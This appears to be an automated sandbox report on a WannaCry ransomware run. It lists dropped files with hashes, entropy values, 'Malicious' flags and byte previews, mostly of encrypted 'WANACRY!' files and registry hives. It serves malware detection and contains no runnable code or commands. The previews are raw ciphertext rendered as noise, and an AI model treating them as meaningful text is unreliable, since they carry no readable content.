                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1256
                                                                              Entropy (8bit):3.524667877403877
                                                                              Encrypted:false
                                                                              SSDEEP:24:fxVCvxV2wKp1xV/uxVC0QlVRxVsTV+xVC3RxVClxVCk+v:JVC5VUVYVCD3VWAVC33VCDVCks
                                                                              MD5:BB9BA05C348A57F6B4A83384133D2833
                                                                              SHA1:67E807B44D8365C153DCEC0FC4FD3830D83D93E0
                                                                              SHA-256:5C7AE9A45FCE2FD61EF6D9597575FBF70095A9A73F77D687B6713707AB23F41F
                                                                              SHA-512:CCCF6583D13A0D153F3D48539D4CC382CFA40B287F47F400043E64335C4C62B86AB48B8B5115D7C58904CE50058180EA7FB5B631A23DB193DF1C2602F1411085
                                                                              Malicious:false
                                                                              Preview:2.0.2.4.-.1.0.-.0.4. .0.6.:.4.3.:.2.3. .U.T.C.|.I.n.f.o.:. .U.n.r.e.c.o.g.n.i.z.e.d. .f.e.a.t.u.r.e. .C.l.o.u.d.A.g.e.n.t._.S.e.t.t.i.n.g.s.....2.0.2.4.-.1.0.-.0.4. .0.6.:.4.3.:.2.3. .U.T.C.|.I.n.f.o.:. .U.n.r.e.c.o.g.n.i.z.e.d. .f.e.a.t.u.r.e. .C.o.r.t.a.n.a.H.o.m.e.U.s.e.r.A.c.t.i.v.i.t.y.E.n.a.b.l.e.d.....2.0.2.4.-.1.0.-.0.4. .0.6.:.4.3.:.2.3. .U.T.C.|.I.n.f.o.:. .U.n.r.e.c.o.g.n.i.z.e.d. .f.e.a.t.u.r.e. .P.W.I.L.O.A.c.t.i.v.i.t.y.U.p.l.o.a.d.E.n.a.b.l.e.d.....2.0.2.4.-.1.0.-.0.4. .0.6.:.4.3.:.2.3. .U.T.C.|.I.n.f.o.:. .U.n.r.e.c.o.g.n.i.z.e.d. .f.e.a.t.u.r.e. .C.l.o.u.d.A.g.e.n.t._.V.o.l.u.m.e.C.o.n.t.r.o.l.....2.0.2.4.-.1.0.-.0.4. .0.6.:.4.3.:.2.3. .U.T.C.|.I.n.f.o.:. .U.n.r.e.c.o.g.n.i.z.e.d. .f.e.a.t.u.r.e. .M.u.l.t.i.A.c.c.o.u.n.t.C.l.o.u.d.S.e.a.r.c.h.S.u.p.p.o.r.t.e.d.....2.0.2.4.-.1.0.-.0.4. .0.6.:.4.3.:.2.3. .U.T.C.|.I.n.f.o.:. .U.n.r.e.c.o.g.n.i.z.e.d. .f.e.a.t.u.r.e. .C.l.o.u.d.A.g.e.n.t._.M.e.d.i.a.C.o.n.t.r.o.l.....2.0.2.4.-.1.0.-.0.4. .0.6.:.4.3.:.2.3. .U.T.C.|.I.n.f.o.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1544
                                                                              Entropy (8bit):7.8482663768748795
                                                                              Encrypted:false
                                                                              SSDEEP:48:bk3OptnCCTO/dmfeHLW2LRpWMlQhJ5go6kaxlYZF:oSdC8GHSOkMSdgoVaLsF
                                                                              MD5:24CAD9F49669B07DF02BFC5855BB42CC
                                                                              SHA1:B3971342D9518B8B2A9E77234A5904C3E588AF94
                                                                              SHA-256:98E892376441E5033508FDBA4596EF06696DDAA52D2023DF8ED41E8DEE494B53
                                                                              SHA-512:496749E704FF6E3D7D0B423A38FFC043DAD36A757D327F04D5223DE17E1C4148E8EC04B2F116A8A6349B63252E2276986E047912386F396055A754BCD552AB2A
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....C#....+7...7s....9.B.W.ywy+.!L..(....x..n..E}..[,ML.N.$.....C......fbwl....v..f3..4A.....y.....V.l...\.&W........d....K.N...~..Y.l..K....A...&....C...G0..GF|}...P#...!0..k...5#.h..X.8.;....U..\ys[....%?R~lzg$s...Qd.]9RK...A..P....1.&K./n..q$..6.............K$]..I;_0..I.H.'.cG...[y.&..=...o....v...t.....U....,....."@[.)..I..wD.6.Ru+......i..4.GRR7....HX.m...tL.{....w.N!..s?...E....k...a..)....uS.S.(......%.a.z.?g..=/.@.}..?{.uV......{......3^o...@H.6..T1Os..._i......E.#..X.M.jh)z..X....".q]m.}Q.4@2#^G.k.@..=...RC....\.U0W..c_.RC.rp...`.9We.w...nEyd.s..E{......:......M...&n.2/V.Hed.*...U....J....\7.W.....-..-...B[B...V...#.d...5f.H........o...cG.e=.0.Y.b. .R.81.....k.Q..ZzX...s-....e..A#..l5;qz...^.`t..Sfz..rX~...e...:.M............#.~.3..8qP..H....&.4:.q<K...=P.>........b\.....x..SC....:..XU.. B*..'...._l.+...`.....$.) .x.b0S.U=.l..U.....c...lK@,......}A........V:....R...(...20a.G.T%4.70M..;..'V..|JH....:..\.N.l...z...htY...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1544
                                                                              Entropy (8bit):7.8482663768748795
                                                                              Encrypted:false
                                                                              SSDEEP:48:bk3OptnCCTO/dmfeHLW2LRpWMlQhJ5go6kaxlYZF:oSdC8GHSOkMSdgoVaLsF
                                                                              MD5:24CAD9F49669B07DF02BFC5855BB42CC
                                                                              SHA1:B3971342D9518B8B2A9E77234A5904C3E588AF94
                                                                              SHA-256:98E892376441E5033508FDBA4596EF06696DDAA52D2023DF8ED41E8DEE494B53
                                                                              SHA-512:496749E704FF6E3D7D0B423A38FFC043DAD36A757D327F04D5223DE17E1C4148E8EC04B2F116A8A6349B63252E2276986E047912386F396055A754BCD552AB2A
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....C#....+7...7s....9.B.W.ywy+.!L..(....x..n..E}..[,ML.N.$.....C......fbwl....v..f3..4A.....y.....V.l...\.&W........d....K.N...~..Y.l..K....A...&....C...G0..GF|}...P#...!0..k...5#.h..X.8.;....U..\ys[....%?R~lzg$s...Qd.]9RK...A..P....1.&K./n..q$..6.............K$]..I;_0..I.H.'.cG...[y.&..=...o....v...t.....U....,....."@[.)..I..wD.6.Ru+......i..4.GRR7....HX.m...tL.{....w.N!..s?...E....k...a..)....uS.S.(......%.a.z.?g..=/.@.}..?{.uV......{......3^o...@H.6..T1Os..._i......E.#..X.M.jh)z..X....".q]m.}Q.4@2#^G.k.@..=...RC....\.U0W..c_.RC.rp...`.9We.w...nEyd.s..E{......:......M...&n.2/V.Hed.*...U....J....\7.W.....-..-...B[B...V...#.d...5f.H........o...cG.e=.0.Y.b. .R.81.....k.Q..ZzX...s-....e..A#..l5;qz...^.`t..Sfz..rX~...e...:.M............#.~.3..8qP..H....&.4:.q<K...=P.>........b\.....x..SC....:..XU.. B*..'...._l.+...`.....$.) .x.b0S.U=.l..U.....c...lK@,......}A........V:....R...(...20a.G.T%4.70M..;..'V..|JH....:..\.N.l...z...htY...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):103448
                                                                              Entropy (8bit):7.998354567055546
                                                                              Encrypted:true
                                                                              SSDEEP:1536:N/0Odritxgyv3038ejgtuzYCMigSsFwmx6GGYgMMf5I0uwr1HVYUKVxhGpO9a:C2OtqkOpgAzYCMlKmUGfL0uwRHVYYZ
                                                                              MD5:0070D3FDE90D13E15A5C7D67441DD0F3
                                                                              SHA1:4134E3B1660033A8F3CCDB51D684D2CA7237670F
                                                                              SHA-256:010F0AED540BB7E930E701A2ABAFDCC33CA187AC553C1D5DD1A0404B4C37B9DA
                                                                              SHA-512:596B248B3C7B2D76F40CBE13715CF9554CDED5FB038F89BBD1931B74CAB11A0BC7717C16273FDDEFC87E13BE456F06CCE0ECC8A3252F19F065BDCC7055D02400
                                                                              Malicious:true
                                                                              Preview:WANACRY!....H..r.ja...:".."B.|.<.T3.....kn..%.#._,Sa.Z.....$X........DA.[s..G...9.4a......,P-'/<...Q.....M.m..m......V...GU..qW..y.}.5!3...T#..f..K..@}.`9Mv.....SXX..vd[....H..8._n...kO..A...O.,m..F...%..3....n..\..T..=+.vf...r......:.Kxu..`.J(.H.....q..............p..93.....#2.Pv....ak;...._.)...A.`.sG.I.a....N..C....}....}&..jz.x...~..D..f.8..Owd.C&.CI..d..V.=._.T......5...1@1...........(.N..j..*^.o.~...'.s#..Sm......=....%.7.......,o.....T........B....yn...0#.3%#..~...T.fQ........0..+..x>^....U.k.....:.?..Ev.N..q....N..9^...V{......`..]pVLm..i874.......'..9$d.v.\?.6=...<.u.10YN...VY".a.^3f.zk.Q6.I..o..S..U......lI.t9<av.~.$..?x=.....7....)....BY.F,........0..}..1d.%NL..6+..k.....UP.D.L]\.Zb.-.$.H.l.....~3../..i....9..S)....m...2.$n.}.G(.nk..'a.......s.`..,.D...._....+..[..IC....l..g..8.c..X.\bF.3..5+.^.......E......`9.IM`-.K.-Qt.. ..>.V..tr]J..!.=n.D(...%t..v....O|.1..8.[.....%UX.Z..v.......bn..:.M&8..@...0...f......i..........gI4.mh.,.f.6..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):103448
                                                                              Entropy (8bit):7.998354567055546
                                                                              Encrypted:true
                                                                              SSDEEP:1536:N/0Odritxgyv3038ejgtuzYCMigSsFwmx6GGYgMMf5I0uwr1HVYUKVxhGpO9a:C2OtqkOpgAzYCMlKmUGfL0uwRHVYYZ
                                                                              MD5:0070D3FDE90D13E15A5C7D67441DD0F3
                                                                              SHA1:4134E3B1660033A8F3CCDB51D684D2CA7237670F
                                                                              SHA-256:010F0AED540BB7E930E701A2ABAFDCC33CA187AC553C1D5DD1A0404B4C37B9DA
                                                                              SHA-512:596B248B3C7B2D76F40CBE13715CF9554CDED5FB038F89BBD1931B74CAB11A0BC7717C16273FDDEFC87E13BE456F06CCE0ECC8A3252F19F065BDCC7055D02400
                                                                              Malicious:true
                                                                              Preview:WANACRY!....H..r.ja...:".."B.|.<.T3.....kn..%.#._,Sa.Z.....$X........DA.[s..G...9.4a......,P-'/<...Q.....M.m..m......V...GU..qW..y.}.5!3...T#..f..K..@}.`9Mv.....SXX..vd[....H..8._n...kO..A...O.,m..F...%..3....n..\..T..=+.vf...r......:.Kxu..`.J(.H.....q..............p..93.....#2.Pv....ak;...._.)...A.`.sG.I.a....N..C....}....}&..jz.x...~..D..f.8..Owd.C&.CI..d..V.=._.T......5...1@1...........(.N..j..*^.o.~...'.s#..Sm......=....%.7.......,o.....T........B....yn...0#.3%#..~...T.fQ........0..+..x>^....U.k.....:.?..Ev.N..q....N..9^...V{......`..]pVLm..i874.......'..9$d.v.\?.6=...<.u.10YN...VY".a.^3f.zk.Q6.I..o..S..U......lI.t9<av.~.$..?x=.....7....)....BY.F,........0..}..1d.%NL..6+..k.....UP.D.L]\.Zb.-.$.H.l.....~3../..i....9..S)....m...2.$n.}.G(.nk..'a.......s.`..,.D...._....+..[..IC....l..g..8.c..X.\bF.3..5+.^.......E......`9.IM`-.K.-Qt.. ..>.V..tr]J..!.=n.D(...%t..v....O|.1..8.[.....%UX.Z..v.......bn..:.M&8..@...0...f......i..........gI4.mh.,.f.6..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):112328
                                                                              Entropy (8bit):7.9984639641562465
                                                                              Encrypted:true
                                                                              SSDEEP:3072:utM0FhOfvaYZutxYCfS46P2dhxwVeQu9qt/:8lhOfvaYZutffS46+a
                                                                              MD5:3ABBA1C698F38C054778A076965E1023
                                                                              SHA1:B3DDCF661BE5F785BF321C2AFDD68399EA92AC77
                                                                              SHA-256:5D91F0F3751B5F9D8D5C84BDE236FDCEC0A5D18E00FCECBD1BD204A4B22C81F2
                                                                              SHA-512:434B7AD5D637536AB20829FC9CDE5F47E0052AE01341DF9E1254FDB720949D7DDC5F942EA18C68C19DD99DE4F2339212D5E0417852CB064562ED21896E2E90BA
                                                                              Malicious:true
                                                                              Preview:WANACRY!....~.....Y6...L.}.....q.J.J.~.....Ch."aA.R....k..5...E..!.a...A./QY.=....18$.......@s....b~..Vy.L...-OD.p..U.....J=z..3.n...dwq-....N.s0.l....mK.....N.aU..l.O.Y..03.<\@._..w...h............Q_...n..>.5.W.v.\.t.9~C`H...&F=...@..l.E).?R...g......F|...z.............D.EP..Ug..L.6.n.k....<k!."..T.\...f.U/'.R..+}..,..".M...7.6J.u..M..48.9..G.\a...........1...,...k.......}.A..$W.4.....IFH...|+..w_...y.6Cen./P......z....`P.|$d.G..T......:.}u....l."....[D.H3^q7.S.=..nT.........<yy...v...f...9....R....jF.^ARFV.6.o.?]..f.....G.....$.a.b.-........cr.nj.O....-..?.O....z.{..X_T0.........WE4h...}.......,.........x*..`v.e._...2d8.5....V.%.E..;....BPM.....7......ZH%..s9.5.k..q.+...1..>|._ .Y...6....N....;1 *.U._ ..5Q.4..M".ss.(.$=.Q2V.LD..'.h.p....|.{....!..Vw..S.:.SB...'$(<.wN..?..D..u.F./.3.....U..l;6a:...mE3..#...U}.ez7...ip...u....%.b.1...P..(.V.#26.K .z.......J.....wD.;.4..."")....J2..k.N..... .%u..w].e...9..([....WuS...@..?.!z..S.l.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):112328
                                                                              Entropy (8bit):7.9984639641562465
                                                                              Encrypted:true
                                                                              SSDEEP:3072:utM0FhOfvaYZutxYCfS46P2dhxwVeQu9qt/:8lhOfvaYZutffS46+a
                                                                              MD5:3ABBA1C698F38C054778A076965E1023
                                                                              SHA1:B3DDCF661BE5F785BF321C2AFDD68399EA92AC77
                                                                              SHA-256:5D91F0F3751B5F9D8D5C84BDE236FDCEC0A5D18E00FCECBD1BD204A4B22C81F2
                                                                              SHA-512:434B7AD5D637536AB20829FC9CDE5F47E0052AE01341DF9E1254FDB720949D7DDC5F942EA18C68C19DD99DE4F2339212D5E0417852CB064562ED21896E2E90BA
                                                                              Malicious:true
                                                                              Preview:WANACRY!....~.....Y6...L.}.....q.J.J.~.....Ch."aA.R....k..5...E..!.a...A./QY.=....18$.......@s....b~..Vy.L...-OD.p..U.....J=z..3.n...dwq-....N.s0.l....mK.....N.aU..l.O.Y..03.<\@._..w...h............Q_...n..>.5.W.v.\.t.9~C`H...&F=...@..l.E).?R...g......F|...z.............D.EP..Ug..L.6.n.k....<k!."..T.\...f.U/'.R..+}..,..".M...7.6J.u..M..48.9..G.\a...........1...,...k.......}.A..$W.4.....IFH...|+..w_...y.6Cen./P......z....`P.|$d.G..T......:.}u....l."....[D.H3^q7.S.=..nT.........<yy...v...f...9....R....jF.^ARFV.6.o.?]..f.....G.....$.a.b.-........cr.nj.O....-..?.O....z.{..X_T0.........WE4h...}.......,.........x*..`v.e._...2d8.5....V.%.E..;....BPM.....7......ZH%..s9.5.k..q.+...1..>|._ .Y...6....N....;1 *.U._ ..5Q.4..M".ss.(.$=.Q2V.LD..'.h.p....|.{....!..Vw..S.:.SB...'$(<.wN..?..D..u.F./.3.....U..l;6a:...mE3..#...U}.ez7...ip...u....%.b.1...P..(.V.#26.K .z.......J.....wD.;.4..."")....J2..k.N..... .%u..w].e...9..([....WuS...@..?.!z..S.l.....
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                              Category:dropped
                                                                              Size (bytes):8192
                                                                              Entropy (8bit):1.1615626245071335
                                                                              Encrypted:false
                                                                              SSDEEP:24:x44W1DlDuUbwB7NX/dN/+wB74ybnl4pwZv0zRHGNNuj1Wd0x5cmmNCwRkPGco:eJ387Rd/7R4e08E4d0x5eNvkP
                                                                              MD5:80440DE24A0A0834030DBCAEC4832822
                                                                              SHA1:296CE8745734A5280B7124F5EED3EAAEECC35F8F
                                                                              SHA-256:7EABBC7B48C2881EB05F01466A2349D5AA27A33CB71387578ED2DB6C3D218352
                                                                              SHA-512:4411F18D133D80EE9183113806C37FD6492C3186F79A8B62CF7354EE2060E2803C8A9F2777DCBD5935916E106A273E338EF2D1C0A7A7DD08079CEFBAFF478784
                                                                              Malicious:false
                                                                              Preview:regf........b.Q.7.................. ...........y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtm*...(................................................................................................................................................................................................................................................................................................................................................kZ%........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                              Category:dropped
                                                                              Size (bytes):8192
                                                                              Entropy (8bit):1.1991200995939892
                                                                              Encrypted:false
                                                                              SSDEEP:24:J144WbYMhO7DlDuUbwB7NX/dN/+wB74ybnl4pwZv0zRHGNNuj1Wd0x5cmmNCwRka:YJUMhO187Rd/7R4e08E4d0x5eNvkP
                                                                              MD5:9EA735BE1C6807B07AD8C26ADEDEC450
                                                                              SHA1:B7D2A817B6A4331DC9F399E3DF7606300DBAC07B
                                                                              SHA-256:D0F48BE0C5776586B5F862F4F4C1CF471A86508E213C330E9A5485D421CB12BD
                                                                              SHA-512:D600CDF0FC89E6E84A689BB47D8EB7EA33BA3E049E17EDDAAE260528C7CD7A148F47EDB1839ACC3727D02A7D72416FA481B00E24FA3E5FC98B763A47DC8A44C0
                                                                              Malicious:false
                                                                              Preview:regf........b.Q.7.................. ...........y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtm*...(................................................................................................................................................................................................................................................................................................................................................kZ%HvLE....................5c.!X...<.+T............hbin................b.Q.7..........nk,.R..(...................................x...............................Test....p...sk..h...h.......t.......H...X.............4.........?.......................?....................... ... ...............YQ..fr]%dc;.............nk .vdG:.Y..................................h...............................Alarmsy ........p...sk..x...x.......t.......H...X.............4.........?.......................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.81519656571167
                                                                              Encrypted:false
                                                                              SSDEEP:24:DPTU1Vkh2HCazvqiXMT1AXh73w4k/cTHw1/0fg+FO:XU1VkhEbLqiXMT+Xh7dMcTHw1t
                                                                              MD5:53806665CFA520EA93722CAC8602FE77
                                                                              SHA1:062091F00494A484464B7B9D7E45D111E65A264B
                                                                              SHA-256:E1387A9278634BED4E351836A7FB45DE74CA23CE5873458B7A4494EFD4E53377
                                                                              SHA-512:03A9967D0FAB9AEB3D125A8C270E0DFECE079903312CB1EC8B0D76E3FF94BB880C2A655014050FE69701DEF72E7E14A11EC04BF6EC4077A95C56A30D14B2CB02
                                                                              Malicious:false
                                                                              Preview:..Dv..%........Eu.u.._...w.....5L..>..6...k.f..#.!.."o................O...zP.P`F,....!..H.w'....A.i.<e...Q..bW..w....c.G..?z...T.......l.2..........!.!.....t._..U.M#o2...5.0....8..bpE...4!i...>..Cya....c....."...3D..n..+e..r.{....3...D.c.....U.#..ry^o~?(;..q..L.c..~.A ..4.8..NNF.F....@....6}'....P'.1...T"hr.....R.|=.%J...:..P._I.F.Y.n4..%....I..AV.<..U....Wqm^Z...R.o).}..4dEU@.h....K....=^.I.K._w.....M...r.Nu..d.............s.ec...q.yO...x..Sm.5.d@@ty`.q.:.0.@(.O../@L..JQ;...a|......PaI...(......Zh...H;...a.~.h.N.F;....".$....`?...cU....`....#~..k.M..3...@.....g.9.Q.H.|...2i.....]e!~.Y...O.j.........CF.f.L..=y..0.f....hI.......2d....A.W.....bhcE..^ac..t...&....x.....#..p......Pz....TE,..r~..1...bL..2....G..:?..K.B<W'Z....|2....`..f.........._....A...~'......K,..P.PCPP...V.....r..O......7h1U.R..>.7.E.,.V.;..Hj..O..H"..#....1.R.v._].Z...,V.'B}..SD.-6-..)'.RV{,.b\...A`Th...Cdx.ev...s.6....~MK..h...d........#....:H..SAf.k/y.d.........].~[
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.824973938901156
                                                                              Encrypted:false
                                                                              SSDEEP:24:JuOQrKZZi/RwZj2qRSAZG4Iwx71b15W0EHj8zrE6SKn:JTQGZZi/RwEqRDjIwxRb1YwzhSKn
                                                                              MD5:9A662F5885103E12713D681B42BD4C4C
                                                                              SHA1:C7B18D4D6F402BD633A9CE5C47728E97E8C55F5B
                                                                              SHA-256:772398DC50147D6A8481B1CC76E9E02EF3AEB3144A3BE413AF7473CD23F675E3
                                                                              SHA-512:E5ABF0D97E3171B6A99D1627389CFD43D97F617DABC4274ACA8EC9F4FCBE3D222E952C6791709A2371B54A29725F25B575AAA531D8EB357617855593FC47D19F
                                                                              Malicious:false
                                                                              Preview:..................g*..:...#....A0.&k.3S.,4-..H%y..H.......X?'.3.6.|f...}M..L..P..B.d.;L..Q.Uj.5..A_B..$:..-h.VN...2|...p..#.~&.P.%.h!J...............[......zS0.4.....U.`...G}?Nv~.?.Wn.....2.>_...P^....N..........5i....Tx.%.......... .d]..z...0uDQ...C%.....eepU}..."0...p....ug.!.\V.....k:....c?......5..l..A...s...S..M..._._:.*iAi..u.oO..J;...i.GJn.....D..f1..=.$..y.-7...*.... b.".....?.v.ps..lT.....s'.sW....f......|+....yF1..~.ZVZ?|..........:...o...{..SJ=.,...~=..fW[?.O_.q.j....5<..J....Tf..m..o.P.y.M....0.%....q.?...'...a"3b0X 0..e..,kVI.|.0.......Z2..t?C...&...b...w...#H.v..k.r>2..rPEO/..Y..s..G..i.....,WB[.bd..e. /.~...a.-&.e#.....8"......)...=.by..@..U> ......V.(.cB..E..L..u..Lk...H!.n%...............[K8.,%X...A.......".Hh5~..\..:h!*)...969&V..R)..d.qpA.\..b.#........?9..q.....o`...W..F..b...3...wJ$.%.-.g...B..F.)$....^..O.9.B.D7.zf..e.>.......:[.d...t}t..`-.c.J...!Np@.:.(H...A...~cag.$7.o..L.M..{.zQ......B1b.#.*.|....f"..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.845656626699939
                                                                              Encrypted:false
                                                                              SSDEEP:24:rxJ9RRBKEMg1VZpUuZG7o9tA2smxAa7BjWT+w+gcq5eEv+0n3k0px:rfTGKmoG7mthtxAa7t/wNcOrTx
                                                                              MD5:68EE158305A5CBDA772CACD1DD632034
                                                                              SHA1:2BEC29AB7D9CCC1C4737C6B70FF2E59F69BAF373
                                                                              SHA-256:D531156E19C3D33A568647147A68424A0DD52809A3A0874A839DFAAC3A18105A
                                                                              SHA-512:DFD32EF1BDFACA69C29FACA31609CC8E9D2DA18A34CC418DB0441F66AD4F3E88B9B816D32E4EFA18F5369E2600A68D4520546692541733E69B4CBE18CF616CC6
                                                                              Malicious:false
                                                                              Preview:.~|.v:....jP....kg.H.......3-..{.C..Q.....=xv.Xrz.[+..t.J>*2.E._.8.M..=&{{.J...L-1z....@.>h.Q!...c......?.Ng......;.tk{.....Y...D.K.e...]...b.{.v...~.......4...S+E.*Xh..07c.p2.I.b.........x..~jjbZ..Fd..:i.S.r.zX..j.iJ.../B3.x.7....?.R.......$vQ}.......O..6b.....[.r.}.?......11lu(&.....7Y.Xk.7..4...cP..#..v...I..ZZLy.....?..G.....p."..A{m..7WC.g.&..E.......7..U.k....;1...A...<.#....3.2......."y~r...0[..<..e.9h..<..f...z...]....m.[0.........XS.A&..DO.>n:....g..n4O......r....-......pR...m..+H!..I}CX.y......!.......B."..e.V.%...G....o.U......x4..).l..l%#.]c..KqyfJ.....4n..V.&7.......@...Td\.<..:8..@..{..F.\.t.E2c...s........vlq....k.....n..A.;..m3,........i.........(.....W.[.w......H..'.y..&=..X(8....v...gx.dO.lA........B@d.[......4...De...*oyD4.k........).Z$,9.|...*.v."C.......[....*P....AERL..\.0..!..U^6..Y.Lo../\..L..O.e....s...n....,?..zA..P......qY.......D..T.h.m.7..^#.R.4vK9L!.........{..{..a.....)...$....}..KfM...D...;...M.H%C.....N
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.838674865824399
                                                                              Encrypted:false
                                                                              SSDEEP:24:9nAPl6Xqh9jmhNOO1aamOQWcfGlTD6ON/PYUtk5qmZoEZaS:9nADnSMORm08wiM3YUsRZoy
                                                                              MD5:DCE58699478379034555985310D6887A
                                                                              SHA1:3A429C1DC26639C8980C6BD78075FADDE9B13EFA
                                                                              SHA-256:A268B9EAB7170E5D5EB6CF4E463732788BB723171CAA3C3042AC65D65562E872
                                                                              SHA-512:7A5C9780142C09C1F52CD70BD66A9B5C47A70F065575F827595BA44A6440CDCD5794D5EF43059A593863200A95A0C5AFC1822FAD422817369F3C31CE7B31B3AA
                                                                              Malicious:false
                                                                              Preview:v0{m$).<W....D.u...4.....!.....WU.G...na...i....R..U.+.Epd{Yeif...Q....0-..-....4...w.O.J......U....._..;...Yj.ba..J!...c....R.[.^......gB1.7....dYj..6.._.t....k.2.;.8....rnz....L..FQu..&.*...&...N.....E.b[..j(.....MU../....oL.Y......W2.o....(.....5.=.l..............e.m.l......B..6s......w..q.....w.C...#.b.......J.....L..........}.t.G..>.>u...iQJ../.8c"y.*..0..#.8~....]A.N4!.........>....>.F..{&..Wt..Za.V.K.2..j...N.W.....+...E..a.(h5.>.@.zM...l...!./..# #>.g...|.>.(..bKI....|.1.dV.(Y......W....C.....r0.@/.%.>f....a....N.K.....p..+V........fl..;.A......e.m2....O..:.O..#....]......w....X.....x........=.t.xx+..f..u)....M@ .PaK.4......F".<.....$...a..!'..2.."w.4U5;..<.%..d.P..moc.......7...%..2'.fF.D..}X....F...?m.[.z.......o.0..)t9_w1.........#.bF.v..B..|.0.....h.P8..(G.../<.sued..@.......Z.4D...B. ..L...].nR...'..4I.Kg.k-.q....,.g...r...M.78..6.m...5..-.^+lN..z.Y..M...Z Z_XF....F..$..72.)......i......?.5F..I..|.|*7.(.*.:%..#..&V.....'6...n\"k...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.802613309956123
                                                                              Encrypted:false
                                                                              SSDEEP:24:qMPYgzBHrC9/NGII7oeHTNyQqxVSsf+Tt:qMrdD7JHTNynrGTt
                                                                              MD5:C62CF48EC64C7E1A7F8B528FD6E8206D
                                                                              SHA1:2770A2685BC8B7459DDEE867CA1C21049CF6A49B
                                                                              SHA-256:519879BD733EE847328C729C80FC65C83ABABBA693E0C16BC123704881345D0A
                                                                              SHA-512:912128ECA342377E6009DFC760AA9277800873973A12ADD78CBC1E91F7A6E9C0AE445FD0F2AEE03DE6BA5BED53832A7E7336AF3681524D856B5BAFE5CA9185C6
                                                                              Malicious:false
                                                                              Preview:/..@._zp.q].j..m..Tk....G..AX....cr....lbG~....m{.j'...?.:.....M.q2n.&.....&Aw.T......!z.....h.U.x....4G.].......Uo.....1.q.u...&G..Gj...D..[.~".. W...!...>.6...7.e)O%.=r.Y.f.p..v....D.`V!.`q..).u..J......A....8.....~..e.*.@6.u.{7qv.....K<.Kv~3..#Z...b..Q.u.{..gp7...3D..A..R.....%.*.$......,...8.ma.f....qY.8..d.=1i.........Ec.....;}NM..w..A...i}+.@.._.F.9)e..;..........4..k^q/.\3...i>.4.8~.... .}............e/.....3..LMJ....b.GH.b(XAa....\*.A |....~..2.^CY.H@H7..c.W..#rA....\....5=li.,.7<.Q."!.-FW..'[..3.P..]lG.ypQ=\.Q....{...s$77..l.PS.a.H]{.N...&...CW6..S.f......$B.%>2jb....L.`..]....d....Q.u......Z...y.F(5.........*..t.}._..`..o3...}.4u..;Nc.....+.!....:.E...hz.. ..J.2.@A.,r.:.Ao...$!R..R.e..'...Ra..3.-FT9V.....N.....2.....m....j....,.L.!........:...O...A...^.......q$.K)....w.lo{...)V............|..n.;Q.=.5........,G$......Bk.....|Lp...mP"..R./$...c.p.x...w6...t`..!.$..c....-...wq...)8;..J%......4)..^*.$.@..L...R..m5.nw.B..EP][...Q.....)..n.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:OpenPGP Secret Key
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.822724817576679
                                                                              Encrypted:false
                                                                              SSDEEP:24:n3lAsDsqg/awLNTUNIu+syIh8E1rjZRbWFcT+N1zEqgeuGeRoO:VAsIqglR21h8enrZoW2O
                                                                              MD5:AF0FB0726366348B27C18AD10A581AE9
                                                                              SHA1:373F990CDF8309BB769F75208659C8763BF25F5F
                                                                              SHA-256:E71EEA745F9D4DBD967597F87662CDF4916F12F7333A0B093272A5F99143F506
                                                                              SHA-512:D79A0CEBC29F14F8EB5AC9724D736FCB40B7E10855A075262A00707028669DB537803C19EBC21A7DEE4B5D983C980120FE12DCC09450BE163736CD7A859335D8
                                                                              Malicious:false
